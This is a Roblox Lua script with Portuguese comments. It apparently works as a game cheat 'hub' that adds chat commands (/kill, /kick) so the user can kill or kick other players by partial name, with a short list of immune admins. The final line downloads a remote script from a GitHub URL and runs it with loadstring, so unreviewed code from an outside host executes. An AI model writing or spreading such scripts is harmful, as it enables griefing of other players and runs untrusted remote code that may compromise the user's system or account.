local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

-- Lista de administradores e jogadores imunes
local admins = {
    ["antimandrak"] = true, -- Admin + imune
    ["ExemploDeAdmin"] = true,
}

-- Função utilitária
local function isAdmin(name)
    return admins[name] == true
end

-- Pega jogador pelo nome parcial
local function getPlayer(name)
    for _, plr in ipairs(Players:GetPlayers()) do
        if plr.Name:lower():sub(1, #name) == name:lower() then
            return plr
        end
    end
end

-- Conexão do chat
LocalPlayer.Chatted:Connect(function(msg)
    local args = string.split(msg, " ")
    local command = args[1]:lower()
    local targetName = args[2]
    local target = getPlayer(targetName)

    if not isAdmin(LocalPlayer.Name) then return end
    if not target then warn("Jogador não encontrado.") return end
    if isAdmin(target.Name) then warn("Jogador imune: " .. target.Name) return end

    if command == "/kill" then
        if target.Character and target.Character:FindFirstChild("Humanoid") then
            target.Character.Humanoid.Health = 0
            warn("Jogador " .. target.Name .. " morto com sucesso.")
        end
    elseif command == "/kick" then
        target:Kick("Você foi expulso pelo admin.")
        warn("Jogador " .. target.Name .. " foi kickado com sucesso.")
    end
end)

-- Executa seu Hub principal normalmente
loadstring(game:HttpGet("https://raw.githubusercontent.com/Laelmano24/Rael-Hub/main/main.txt"))()
